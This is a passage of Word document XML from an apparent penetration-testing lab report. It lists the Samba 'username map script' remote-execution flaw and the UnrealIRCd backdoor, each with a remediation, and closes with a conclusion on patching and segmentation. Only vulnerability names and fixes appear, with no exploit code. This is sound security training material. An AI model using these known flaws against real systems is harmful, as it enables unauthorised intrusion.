                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Samba 3.x (ports 139/445)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3360"/>
            <w:shd w:fill="EEF2FF" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F2933"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">'username map script' allows unauthenticated remote command execution as root.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="EEF2FF" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1F2933"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Upgrade Samba to a patched release and remove the 'username map script' option.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">(A third commonly found issue on this target is the UnrealIRCd 3.2.8.1 backdoor, CVE-2010-2075, on port 6667, fixed by replacing the trojaned IRC daemon.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The target exposed multiple legacy services with well-known, unauthenticated remote-code-execution vulnerabilities. In a real environment these would be critical findings requiring immediate patching, service removal, network segmentation, and firewalling. The lab demonstrates the full attacker workflow — discover, enumerate, deliver, beacon, and exploit — entirely within a safe isolated network.</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4"/>
      </w:pBdr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="7B8794"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">MD Ala Uddin  •  </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="7B8794"/>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8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3"/>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Deliverable</dc:title>
  <dc:creator>MD Ala Uddin</dc:creator>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-16T10:08:08.016Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-16T10:08:08.017Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>